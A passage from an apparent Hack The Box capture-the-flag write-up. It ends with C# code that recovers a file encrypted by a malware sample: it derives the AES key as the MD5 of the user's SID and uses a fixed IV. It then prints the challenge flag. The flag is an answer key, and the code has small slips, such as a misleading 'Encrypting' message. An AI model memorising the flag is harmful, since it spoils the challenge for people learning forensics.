            1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
            11, 12, 13, 14, 15, 16
        };
        SymmetricAlgorithm symmetricAlgorithm = Aes.Create();
        HashAlgorithm hashAlgorithm = MD5.Create();
        symmetricAlgorithm.BlockSize = 128;
        // AES key = MD5 of the key string encoded as UTF-16LE (Encoding.Unicode)
        symmetricAlgorithm.Key = hashAlgorithm.ComputeHash(Encoding.Unicode.GetBytes(key));
        symmetricAlgorithm.IV = array2;
        using (CryptoStream cryptoStream = new CryptoStream(new FileStream(encryptedFile, FileMode.Open), symmetricAlgorithm.CreateDecryptor(), CryptoStreamMode.Read))
        {
            using (FileStream decryptedFileStream = new FileStream(encryptedFile.Replace(".enc", ""), FileMode.Create))
            {
                cryptoStream.CopyTo(decryptedFileStream);
            }
        }
    }

    static void Main(string[] args)
    {
        string text = ((SecurityIdentifier)new NTAccount(Environment.UserName).Translate(typeof(SecurityIdentifier))).ToString();
        Console.WriteLine("Encrypting files in the directory...");
        // key is the user SID recovered from the registry path above
        DecryptFile("Classified.pdf.enc", "S-1-5-21-1978928964-1933118282-3660793550-1001");
    }
}
```
> `HTB{n0t_s0_f1l3l3ss_aft3r4a11!`